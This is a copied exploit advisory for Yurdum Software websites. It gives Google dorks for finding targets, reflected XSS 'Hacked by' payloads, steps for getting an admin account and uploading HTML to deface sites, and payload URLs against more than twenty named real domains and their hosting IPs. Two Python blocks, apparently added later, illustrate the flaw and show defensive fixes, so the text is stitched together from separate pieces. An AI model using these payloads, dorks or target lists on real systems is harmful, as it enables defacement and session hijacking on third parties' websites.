Yurdum Software Reflected XSS Privilege Escalation

CVE: (not listed) | Category: CWE-79 | Price: Unknown | Severity: Critical
Author: Unknown (the advisory body credits KingSkrupellos) | Risk: High | Exploitation Type: Remote | Date: 2019-06-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060104

Below is a copy:

Yurdum Software Reflected XSS Privilege Escalation
###################################################################

# Exploit Title : Yurdum Software Reflected XSS Privilege Escalation
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/06/2019
# Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : 
CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
CWE-671 [ Lack of Administrator Control over Security ]
CWE-522 [ Insufficiently Protected Credentials ]
CWE-284 [ Improper Access Control ]
CWE-285 [ Improper Authorization ]
# Google Dorks : ( "Yer sağlayıcı" is Turkish for "Hosting provider" )
inurl:/?pnum= intext:Yer sağlayıcı: Yurdum Yazılım site:tr
inurl:/?pnum= intext:Yer sağlayıcı: SitenizOlsun. site:tr
intext:Yer sağlayıcı: SitenizOlsun site:tr
intext:Yer sağlayıcı: Yurdum Yazılım site:tr
inurl:/?pnum= site:tr
inurl:/?pnum= site:gov.tr
inurl:/?pnum= site:bel.tr
inurl:/?pnum= site:k12.tr
inurl:/?pnum= site:org.tr
inurl:/?pnum= site:com.tr
inurl:/?pnum= site:com
inurl:/?pnum= site:net
inurl:/?pnum= site:org
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038

###################################################################

Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************
The server reads the pt parameter directly from the HTTP request and reflects it back
unencoded in the HTTP response. Reflected XSS occurs when an attacker causes a victim to
supply dangerous content to a vulnerable web application, which reflects it back to the
victim, where the browser executes it. The most common delivery mechanism is to include
the payload as a parameter in a URL that is posted publicly or e-mailed directly to the
victim; URLs built this way are the core of many phishing schemes, in which the attacker
convinces the victim to visit a URL that points at the vulnerable site. A successful
exploit lets the attacker run arbitrary script in the context of the affected site and
read browser-side data belonging to it. For example, the attacker can steal the victim's
cookies in order to hijack the session and gain access to the system; if the session
cookie is marked HttpOnly the script cannot read it, but it can still act on the victim's
behalf from inside the page.

Impact 2 Lack of Administrator Control over Security (and the related weaknesses) :
***********************************************
CWE-671 : The product uses security features in a way that prevents the product's
administrator from tailoring security settings to the environment in which the product
is used. This introduces resultant weaknesses or prevents it from operating at the level
of security the administrator wants.

CWE-522 : The application transmits or stores authentication credentials using an
insecure method that is susceptible to unauthorized interception or retrieval. Here the
administrator e-mail address and password are generated by the vendor and displayed in
the clear when the trial site is created.

CWE-284 / CWE-285 : The software does not perform, or incorrectly performs, an
authorization check when an actor attempts to access a resource or perform an action.
An attacker could gain access to user accounts and to the sensitive data those accounts use.

###################################################################

# Reflected Cross Site Scripting XSS Exploits and Payloads :
*******************************************************
1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>

1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

/?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos

/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee>

/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>
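As an added illustration, not code from the advisory or from the vendor, the following Python simulates a page that interpolates the pt parameter raw into its HTML, the same page with output encoding applied at the sink, and the check a tester runs on a response to tell live reflection from encoded reflection. The table/h3 layout, the marker string and the host example.invalid are assumptions; the vendor's PHP is not on this page.

```python
import html
from urllib.parse import urlencode

# Constructed payload: the advisory's first probe, URL-decoded.
PAYLOAD = "1'<marquee><font color=lime size=32>XSS-Test</font></marquee>"

TEMPLATE = "<html><body><table><tr><td><h3>Page {pt}</h3></td></tr></table></body></html>"


def render_vulnerable(pt: str) -> str:
    """Hypothetical vulnerable page: pt is dropped into HTML text unencoded,
    which is how the advisory's responses behave (assumed layout, not vendor code)."""
    return TEMPLATE.format(pt=pt)


def render_fixed(pt: str) -> str:
    """Same page with output encoding at the HTML-text sink."""
    return TEMPLATE.format(pt=html.escape(pt, quote=True))


def build_probe_url(base: str, page_param: str, page_id: int, marker: str) -> str:
    """Build a probe such as /?pnum=1&pt=1'<marquee>...; urlencode produces %27, %3C, %3E."""
    return base + "/?" + urlencode({page_param: page_id, "pt": "1'" + marker})


def is_reflected_unescaped(body: str, marker: str) -> bool:
    """True when the marker survives in the response as live markup."""
    return marker in body


def classify(body: str, marker: str = "<marquee>") -> str:
    """vulnerable: marker reflected as markup; reflected-encoded: reflected only as
    &lt;...&gt;; not-reflected: the parameter never reaches the page."""
    if is_reflected_unescaped(body, marker):
        return "vulnerable"
    if html.escape(marker) in body:
        return "reflected-encoded"
    return "not-reflected"


if __name__ == "__main__":
    print(build_probe_url("http://example.invalid", "pnum", 1, "<marquee>x</marquee>"))
    print("raw interpolation :", classify(render_vulnerable(PAYLOAD)))
    print("escaped at sink   :", classify(render_fixed(PAYLOAD)))
```

The fix is the sink-side encoding in render_fixed; the advisory's breakout payload (closing h3, tr, td, table and div before the marquee) matters only because the raw value lands inside nested elements, and encoding removes that concern regardless of nesting.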

# Add Administrator / Privilege Escalation Vulnerability :
***********************************************
To obtain an administrator account, register at sitenizolsun.com => click " Ücretsiz Dene " [ Try Free ]

Then you will be redirected to this address:

sitenizolsun.com/website-temalari?paket=6

sitenizolsun.com/website-temalari?paket=[ID-NUMBER]

Choose the package you want.

sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6

sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER]

Ücretsiz Deneme Web Siteni Oluştur [ Create Your Free Trial Website ]

Enter any random username, a random or real e-mail address, a title and a random phone number.

Then click " Sitemi Oluştur " [ Create My Website ] and wait.

It creates the test site and displays the administrator e-mail address and password in the clear.

http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com

Yönetim paneli kullanıcı adınız: YOUR ADMINISTRATOR E-MAIL ADDRESS HERE [ Your admin panel username ]
Yönetim paneli şifreniz : YOUR ADMINISTRATOR PASSWORD HERE [ Your admin panel password ]

Administrator Login Path :

/login/
/login/do_login.php

You get one free test website, but approximately 9397 websites can be controlled at the same time. (The advisory documents only the trial site's own upload form, below; it gives no separate step for reaching the other sites.)

You can upload files to the vulnerable system. 

Step 1 : Go to " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ] =>

Step 2 : Click " Anasayfayı Düzenle " [ Edit Homepage ]

Step 3 : Choose " Resim Ekle " [ Insert Image ] => Click " Kaynak " [ Source ]

Step 4 : /syp/dosyayukle.php?DosyaTipi=2

http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2

You will see a yellow and white page that says :

Step 5 : Yüklemek istediğiniz dosyaları "Gözat"a tıklayarak bilgisayarınızdan seçiniz ve "Yükle" ye tıklayınız.

[ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ]

Step 6 : Choose " Sayfaya sığdır (Resimler için geçerli) Max 30 MB " [ Fit to page (applies to images) Max 30 MB ]

Step 7 : Choose an .html file on your PC and upload it; the image form accepts HTML, not only images. Click the " Yükle " [ Upload ] button.

Your File Destination : 

/FileUpload/epXXXXXX/File/[yourfilename.html]

If you use other sections such as " Add Header Image " or " Add Album ":

Your File Destination : 

/FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg

/FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg

You can see your defaced indexes on 9397 websites at the same time.

Congratulations :) 
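The upload step above works because an "insert image" endpoint accepts an .html file and stores it, under the client's own name, beneath a web-served path. Below is an added example, written for this page and not the vendor's dosyayukle.php, of the server-side checks that would have blocked it: identify the content by magic bytes instead of trusting the extension, give the stored file a random name, confine the path to the tenant directory, and serve uploads with headers that stop the browser from treating them as a document. The tenant directory name, the image allow-list, the sample inputs and the header set are assumptions.

```python
import os
import secrets
from typing import Dict, Optional

# Assumed policy for an image-upload endpoint: real images only, recognised by
# their leading magic bytes, never by the client-supplied file name.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
CONTENT_TYPES = {".jpg": "image/jpeg", ".png": "image/png", ".gif": "image/gif"}
MAX_BYTES = 30 * 1024 * 1024  # the form's advertised "Max 30 MB"


class UploadRejected(ValueError):
    """Raised for anything that must not reach the FileUpload directory."""


def sniff_image_extension(data: bytes) -> Optional[str]:
    """Canonical extension for the detected image type, or None if not an image."""
    for signature, ext in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return ext
    return None


def store_upload(client_name: str, data: bytes, tenant_dir: str) -> str:
    """Validate an upload and return the relative path it would be stored at.

    The advisory's abuse (an index.html landing in /FileUpload/epXXXXXX/File/)
    fails three times over: the content is not an image, the extension would
    not match the sniffed type, and the stored name is never the client's."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file exceeds 30 MB")
    ext = sniff_image_extension(data)
    if ext is None:
        raise UploadRejected("content is not a supported image")
    client_ext = os.path.splitext(os.path.basename(client_name))[1].lower()
    if client_ext == ".jpeg":
        client_ext = ".jpg"
    if client_ext != ext:
        raise UploadRejected("extension %r does not match sniffed type %s" % (client_ext, ext))
    stored_name = secrets.token_hex(16) + ext  # attacker cannot pick index.html
    base = os.path.normpath(tenant_dir)
    path = os.path.normpath(os.path.join(base, "File", stored_name))
    if not path.startswith(base + os.sep):  # belt and braces against traversal
        raise UploadRejected("path escapes tenant directory")
    return path


def is_accepted(client_name: str, data: bytes, tenant_dir: str = "FileUpload/ep123456") -> bool:
    """True if store_upload would accept the file (convenience wrapper)."""
    try:
        store_upload(client_name, data, tenant_dir)
        return True
    except UploadRejected:
        return False


def download_headers(stored_path: str) -> Dict[str, str]:
    """Headers for serving a stored upload: type fixed from our own extension,
    no MIME sniffing, and a CSP sandbox so even a mislabeled file cannot run
    script in the site's origin."""
    ext = os.path.splitext(stored_path)[1]
    return {
        "Content-Type": CONTENT_TYPES[ext],
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


# Constructed sample inputs: a minimal JPEG header and the kind of HTML page
# the advisory uploads as a defacement.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_HTML = b"<html><marquee>Hacked</marquee></html>"

if __name__ == "__main__":
    print(store_upload("photo.jpg", SAMPLE_JPEG, "FileUpload/ep123456"))
    for name, data in (("index.html", SAMPLE_HTML), ("index.jpg", SAMPLE_HTML)):
        print(name, "accepted" if is_accepted(name, data) else "rejected")
```

The random stored name also removes the defacement value of the upload even if validation were bypassed: an attacker who cannot choose the file name cannot overwrite the site's index, and nosniff plus the CSP sandbox keep a smuggled HTML file inert if it is ever fetched directly.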

###################################################################

# Example Vulnerable Sites for XSS Reflected Cross Site Scripting  :
***********************************************************
Vulnerable IP Addresses => 

51.254.33.49 => There are 37 domains hosted on this server.

81.171.1.140 => There are 8,552 domains hosted on this server.

159.69.209.93 => There are 798 domains hosted on this server.

[+] gurelektrikotomasyon.com/?Syf=4&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] giresunkesaparnavutkoy.com/?SyfNmb=2&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] gezintihaberleri.com/?SyfNmb=4&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] furkankirtasiye.com/?pnum=8&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] edirneselimiyeemlak.com/?Syf=13&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] doganisguvenligi.com/?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] cyberenerji.com/?pnum=9&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] siirtfistikpazari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] saglamelektronik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] radyobalkan.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] pediatrikkalpcerrahisi.com/?Syf=15&blg=1&ncat_id=699210&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] ozerdeminsaatdekorasyon.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] otoarizatespit.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] onaranelektrik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] oabtfizik.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] trabzonbasket.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] ozelegitimaraclari.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] reklamfolyosu.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] sivasaskf.org/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] tablopark.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] vansuaritmaci.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

[+] noktadusakabin.com/?pnum=1&pt=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.
